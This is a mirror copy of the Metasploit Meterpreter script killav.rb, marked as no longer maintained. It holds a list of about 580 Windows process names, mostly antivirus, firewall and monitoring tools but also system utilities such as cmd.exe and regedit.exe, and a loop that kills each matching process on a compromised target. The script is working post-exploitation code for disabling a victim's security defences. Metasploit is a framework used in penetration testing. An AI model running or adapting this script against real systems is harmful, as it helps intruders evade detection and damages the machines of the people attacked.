Mirror of metasploit
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

killav.rb 8.8KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405406407408409410411412413414415416417418419420421422423424425426427428429430431432433434435436437438439440441442443444445446447448449450451452453454455456457458459460461462463464465466467468469470471472473474475476477478479480481482483484485486487488489490491492493494495496497498499500501502503504505506507508509510511512513514515516517518519520521522523524525526527528529530531532533534535536537538539540541542543544545546547548549550551552553554555556557558559560561562563564565566567568569570571572573574575576577578579580581582583584585586587588589590591592593594595596597598599600601602603604605606607608609610611612613614615616617618619
  1. ##
  2. # WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
  3. # If you'd like to improve this script, please try to port it as a post
  4. # module instead. Thank you.
  5. ##
  6. #
  7. # Meterpreter script that kills all Antivirus processes
  8. # Provided by: Jerome Athias <jerome.athias [at] free.fr>
  9. #
  10. @@exec_opts = Rex::Parser::Arguments.new(
  11. "-h" => [ false, "Help menu." ]
  12. )
  13. def usage
  14. print_line("Usage:" + @@exec_opts.usage)
  15. raise Rex::Script::Completed
  16. end
  17. @@exec_opts.parse(args) { |opt, idx, val|
  18. case opt
  19. when "-h"
  20. usage
  21. end
  22. }
  23. print_status("Killing Antivirus services on the target...")
  24. avs = %W{
  25. AAWTray.exe
  26. Ad-Aware.exe
  27. MSASCui.exe
  28. _avp32.exe
  29. _avpcc.exe
  30. _avpm.exe
  31. aAvgApi.exe
  32. ackwin32.exe
  33. adaware.exe
  34. advxdwin.exe
  35. agentsvr.exe
  36. agentw.exe
  37. alertsvc.exe
  38. alevir.exe
  39. alogserv.exe
  40. amon9x.exe
  41. anti-trojan.exe
  42. antivirus.exe
  43. ants.exe
  44. apimonitor.exe
  45. aplica32.exe
  46. apvxdwin.exe
  47. arr.exe
  48. atcon.exe
  49. atguard.exe
  50. atro55en.exe
  51. atupdater.exe
  52. atwatch.exe
  53. au.exe
  54. aupdate.exe
  55. auto-protect.nav80try.exe
  56. autodown.exe
  57. autotrace.exe
  58. autoupdate.exe
  59. avconsol.exe
  60. ave32.exe
  61. avgcc32.exe
  62. avgctrl.exe
  63. avgemc.exe
  64. avgnt.exe
  65. avgrsx.exe
  66. avgserv.exe
  67. avgserv9.exe
  68. avguard.exe
  69. avgw.exe
  70. avkpop.exe
  71. avkserv.exe
  72. avkservice.exe
  73. avkwctl9.exe
  74. avltmain.exe
  75. avnt.exe
  76. avp.exe
  77. avp.exe
  78. avp32.exe
  79. avpcc.exe
  80. avpdos32.exe
  81. avpm.exe
  82. avptc32.exe
  83. avpupd.exe
  84. avsched32.exe
  85. avsynmgr.exe
  86. avwin.exe
  87. avwin95.exe
  88. avwinnt.exe
  89. avwupd.exe
  90. avwupd32.exe
  91. avwupsrv.exe
  92. avxmonitor9x.exe
  93. avxmonitornt.exe
  94. avxquar.exe
  95. backweb.exe
  96. bargains.exe
  97. bd_professional.exe
  98. beagle.exe
  99. belt.exe
  100. bidef.exe
  101. bidserver.exe
  102. bipcp.exe
  103. bipcpevalsetup.exe
  104. bisp.exe
  105. blackd.exe
  106. blackice.exe
  107. blink.exe
  108. blss.exe
  109. bootconf.exe
  110. bootwarn.exe
  111. borg2.exe
  112. bpc.exe
  113. brasil.exe
  114. bs120.exe
  115. bundle.exe
  116. bvt.exe
  117. ccapp.exe
  118. ccevtmgr.exe
  119. ccpxysvc.exe
  120. cdp.exe
  121. cfd.exe
  122. cfgwiz.exe
  123. cfiadmin.exe
  124. cfiaudit.exe
  125. cfinet.exe
  126. cfinet32.exe
  127. claw95.exe
  128. claw95cf.exe
  129. clean.exe
  130. cleaner.exe
  131. cleaner3.exe
  132. cleanpc.exe
  133. click.exe
  134. cmd.exe
  135. cmd32.exe
  136. cmesys.exe
  137. cmgrdian.exe
  138. cmon016.exe
  139. connectionmonitor.exe
  140. cpd.exe
  141. cpf9x206.exe
  142. cpfnt206.exe
  143. ctrl.exe
  144. cv.exe
  145. cwnb181.exe
  146. cwntdwmo.exe
  147. datemanager.exe
  148. dcomx.exe
  149. defalert.exe
  150. defscangui.exe
  151. defwatch.exe
  152. deputy.exe
  153. divx.exe
  154. dllcache.exe
  155. dllreg.exe
  156. doors.exe
  157. dpf.exe
  158. dpfsetup.exe
  159. dpps2.exe
  160. drwatson.exe
  161. drweb32.exe
  162. drwebupw.exe
  163. dssagent.exe
  164. dvp95.exe
  165. dvp95_0.exe
  166. ecengine.exe
  167. efpeadm.exe
  168. emsw.exe
  169. ent.exe
  170. esafe.exe
  171. escanhnt.exe
  172. escanv95.exe
  173. espwatch.exe
  174. ethereal.exe
  175. etrustcipe.exe
  176. evpn.exe
  177. exantivirus-cnet.exe
  178. exe.avxw.exe
  179. expert.exe
  180. explore.exe
  181. f-agnt95.exe
  182. f-prot.exe
  183. f-prot95.exe
  184. f-stopw.exe
  185. fameh32.exe
  186. fast.exe
  187. fch32.exe
  188. fih32.exe
  189. findviru.exe
  190. firewall.exe
  191. fnrb32.exe
  192. fp-win.exe
  193. fp-win_trial.exe
  194. fprot.exe
  195. frw.exe
  196. fsaa.exe
  197. fsav.exe
  198. fsav32.exe
  199. fsav530stbyb.exe
  200. fsav530wtbyb.exe
  201. fsav95.exe
  202. fsgk32.exe
  203. fsm32.exe
  204. fsma32.exe
  205. fsmb32.exe
  206. gator.exe
  207. gbmenu.exe
  208. gbpoll.exe
  209. generics.exe
  210. gmt.exe
  211. guard.exe
  212. guarddog.exe
  213. hacktracersetup.exe
  214. hbinst.exe
  215. hbsrv.exe
  216. hotactio.exe
  217. hotpatch.exe
  218. htlog.exe
  219. htpatch.exe
  220. hwpe.exe
  221. hxdl.exe
  222. hxiul.exe
  223. iamapp.exe
  224. iamserv.exe
  225. iamstats.exe
  226. ibmasn.exe
  227. ibmavsp.exe
  228. icload95.exe
  229. icloadnt.exe
  230. icmon.exe
  231. icsupp95.exe
  232. icsuppnt.exe
  233. idle.exe
  234. iedll.exe
  235. iedriver.exe
  236. iexplorer.exe
  237. iface.exe
  238. ifw2000.exe
  239. inetlnfo.exe
  240. infus.exe
  241. infwin.exe
  242. init.exe
  243. intdel.exe
  244. intren.exe
  245. iomon98.exe
  246. istsvc.exe
  247. jammer.exe
  248. jdbgmrg.exe
  249. jedi.exe
  250. kavlite40eng.exe
  251. kavpers40eng.exe
  252. kavpf.exe
  253. kazza.exe
  254. keenvalue.exe
  255. kerio-pf-213-en-win.exe
  256. kerio-wrl-421-en-win.exe
  257. kerio-wrp-421-en-win.exe
  258. kernel32.exe
  259. killprocesssetup161.exe
  260. launcher.exe
  261. ldnetmon.exe
  262. ldpro.exe
  263. ldpromenu.exe
  264. ldscan.exe
  265. lnetinfo.exe
  266. loader.exe
  267. localnet.exe
  268. lockdown.exe
  269. lockdown2000.exe
  270. lookout.exe
  271. lordpe.exe
  272. lsetup.exe
  273. luall.exe
  274. luau.exe
  275. lucomserver.exe
  276. luinit.exe
  277. luspt.exe
  278. mapisvc32.exe
  279. mcagent.exe
  280. mcmnhdlr.exe
  281. mcshield.exe
  282. mctool.exe
  283. mcupdate.exe
  284. mcvsrte.exe
  285. mcvsshld.exe
  286. md.exe
  287. mfin32.exe
  288. mfw2en.exe
  289. mfweng3.02d30.exe
  290. mgavrtcl.exe
  291. mgavrte.exe
  292. mghtml.exe
  293. mgui.exe
  294. minilog.exe
  295. mmod.exe
  296. monitor.exe
  297. moolive.exe
  298. mostat.exe
  299. mpfagent.exe
  300. mpfservice.exe
  301. mpftray.exe
  302. mrflux.exe
  303. msapp.exe
  304. msbb.exe
  305. msblast.exe
  306. mscache.exe
  307. msccn32.exe
  308. mscman.exe
  309. msconfig.exe
  310. msdm.exe
  311. msdos.exe
  312. msiexec16.exe
  313. msinfo32.exe
  314. mslaugh.exe
  315. msmgt.exe
  316. msmsgri32.exe
  317. mssmmc32.exe
  318. mssys.exe
  319. msvxd.exe
  320. mu0311ad.exe
  321. mwatch.exe
  322. n32scanw.exe
  323. nav.exe
  324. navap.navapsvc.exe
  325. navapsvc.exe
  326. navapw32.exe
  327. navdx.exe
  328. navlu32.exe
  329. navnt.exe
  330. navstub.exe
  331. navw32.exe
  332. navwnt.exe
  333. nc2000.exe
  334. ncinst4.exe
  335. ndd32.exe
  336. neomonitor.exe
  337. neowatchlog.exe
  338. netarmor.exe
  339. netd32.exe
  340. netinfo.exe
  341. netmon.exe
  342. netscanpro.exe
  343. netspyhunter-1.2.exe
  344. netstat.exe
  345. netutils.exe
  346. nisserv.exe
  347. nisum.exe
  348. nmain.exe
  349. nod32.exe
  350. normist.exe
  351. norton_internet_secu_3.0_407.exe
  352. notstart.exe
  353. npf40_tw_98_nt_me_2k.exe
  354. npfmessenger.exe
  355. nprotect.exe
  356. npscheck.exe
  357. npssvc.exe
  358. nsched32.exe
  359. nssys32.exe
  360. nstask32.exe
  361. nsupdate.exe
  362. nt.exe
  363. ntrtscan.exe
  364. ntvdm.exe
  365. ntxconfig.exe
  366. nui.exe
  367. nupgrade.exe
  368. nvarch16.exe
  369. nvc95.exe
  370. nvsvc32.exe
  371. nwinst4.exe
  372. nwservice.exe
  373. nwtool16.exe
  374. ollydbg.exe
  375. onsrvr.exe
  376. optimize.exe
  377. ostronet.exe
  378. otfix.exe
  379. outpost.exe
  380. outpostinstall.exe
  381. outpostproinstall.exe
  382. padmin.exe
  383. panixk.exe
  384. patch.exe
  385. pavcl.exe
  386. pavproxy.exe
  387. pavsched.exe
  388. pavw.exe
  389. pccwin98.exe
  390. pcfwallicon.exe
  391. pcip10117_0.exe
  392. pcscan.exe
  393. pdsetup.exe
  394. periscope.exe
  395. persfw.exe
  396. perswf.exe
  397. pf2.exe
  398. pfwadmin.exe
  399. pgmonitr.exe
  400. pingscan.exe
  401. platin.exe
  402. pop3trap.exe
  403. poproxy.exe
  404. popscan.exe
  405. portdetective.exe
  406. portmonitor.exe
  407. powerscan.exe
  408. ppinupdt.exe
  409. pptbc.exe
  410. ppvstop.exe
  411. prizesurfer.exe
  412. prmt.exe
  413. prmvr.exe
  414. procdump.exe
  415. processmonitor.exe
  416. procexplorerv1.0.exe
  417. programauditor.exe
  418. proport.exe
  419. protectx.exe
  420. pspf.exe
  421. purge.exe
  422. qconsole.exe
  423. qserver.exe
  424. rapapp.exe
  425. rav7.exe
  426. rav7win.exe
  427. rav8win32eng.exe
  428. ray.exe
  429. rb32.exe
  430. rcsync.exe
  431. realmon.exe
  432. reged.exe
  433. regedit.exe
  434. regedt32.exe
  435. rescue.exe
  436. rescue32.exe
  437. rrguard.exe
  438. rshell.exe
  439. rtvscan.exe
  440. rtvscn95.exe
  441. rulaunch.exe
  442. run32dll.exe
  443. rundll.exe
  444. rundll16.exe
  445. ruxdll32.exe
  446. safeweb.exe
  447. sahagent.exe
  448. save.exe
  449. savenow.exe
  450. sbserv.exe
  451. sc.exe
  452. scam32.exe
  453. scan32.exe
  454. scan95.exe
  455. scanpm.exe
  456. scrscan.exe
  457. serv95.exe
  458. setup_flowprotector_us.exe
  459. setupvameeval.exe
  460. sfc.exe
  461. sgssfw32.exe
  462. sh.exe
  463. shellspyinstall.exe
  464. shn.exe
  465. showbehind.exe
  466. smc.exe
  467. sms.exe
  468. smss32.exe
  469. soap.exe
  470. sofi.exe
  471. sperm.exe
  472. spf.exe
  473. sphinx.exe
  474. spoler.exe
  475. spoolcv.exe
  476. spoolsv32.exe
  477. spyxx.exe
  478. srexe.exe
  479. srng.exe
  480. ss3edit.exe
  481. ssg_4104.exe
  482. ssgrate.exe
  483. st2.exe
  484. start.exe
  485. stcloader.exe
  486. supftrl.exe
  487. support.exe
  488. supporter5.exe
  489. svc.exe
  490. svchostc.exe
  491. svchosts.exe
  492. svshost.exe
  493. sweep95.exe
  494. sweepnet.sweepsrv.sys.swnetsup.exe
  495. symproxysvc.exe
  496. symtray.exe
  497. sysedit.exe
  498. system.exe
  499. system32.exe
  500. sysupd.exe
  501. taskmg.exe
  502. taskmgr.exe
  503. taskmo.exe
  504. taskmon.exe
  505. taumon.exe
  506. tbscan.exe
  507. tc.exe
  508. tca.exe
  509. tcm.exe
  510. tds-3.exe
  511. tds2-98.exe
  512. tds2-nt.exe
  513. teekids.exe
  514. tfak.exe
  515. tfak5.exe
  516. tgbob.exe
  517. titanin.exe
  518. titaninxp.exe
  519. tracert.exe
  520. trickler.exe
  521. trjscan.exe
  522. trjsetup.exe
  523. trojantrap3.exe
  524. tsadbot.exe
  525. tvmd.exe
  526. tvtmd.exe
  527. undoboot.exe
  528. updat.exe
  529. update.exe
  530. upgrad.exe
  531. utpost.exe
  532. vbcmserv.exe
  533. vbcons.exe
  534. vbust.exe
  535. vbwin9x.exe
  536. vbwinntw.exe
  537. vcsetup.exe
  538. vet32.exe
  539. vet95.exe
  540. vettray.exe
  541. vfsetup.exe
  542. vir-help.exe
  543. virusmdpersonalfirewall.exe
  544. vnlan300.exe
  545. vnpc3000.exe
  546. vpc32.exe
  547. vpc42.exe
  548. vpfw30s.exe
  549. vptray.exe
  550. vscan40.exe
  551. vscenu6.02d30.exe
  552. vsched.exe
  553. vsecomr.exe
  554. vshwin32.exe
  555. vsisetup.exe
  556. vsmain.exe
  557. vsmon.exe
  558. vsstat.exe
  559. vswin9xe.exe
  560. vswinntse.exe
  561. vswinperse.exe
  562. w32dsm89.exe
  563. w9x.exe
  564. watchdog.exe
  565. webdav.exe
  566. webscanx.exe
  567. webtrap.exe
  568. wfindv32.exe
  569. whoswatchingme.exe
  570. wimmun32.exe
  571. win-bugsfix.exe
  572. win32.exe
  573. win32us.exe
  574. winactive.exe
  575. window.exe
  576. windows.exe
  577. wininetd.exe
  578. wininitx.exe
  579. winlogin.exe
  580. winmain.exe
  581. winnet.exe
  582. winppr32.exe
  583. winrecon.exe
  584. winservn.exe
  585. winssk32.exe
  586. winstart.exe
  587. winstart001.exe
  588. wintsk32.exe
  589. winupdate.exe
  590. wkufind.exe
  591. wnad.exe
  592. wnt.exe
  593. wradmin.exe
  594. wrctrl.exe
  595. wsbgate.exe
  596. wupdater.exe
  597. wupdt.exe
  598. wyvernworksfirewall.exe
  599. xpf202en.exe
  600. zapro.exe
  601. zapsetup3001.exe
  602. zatutor.exe
  603. zonalm2601.exe
  604. zonealarm.exe
  605. }
  606. client.sys.process.get_processes().each do |x|
  607. if (avs.index(x['name'].downcase))
  608. print_status("Killing off #{x['name']}...")
  609. client.sys.process.kill(x['pid'])
  610. end
  611. end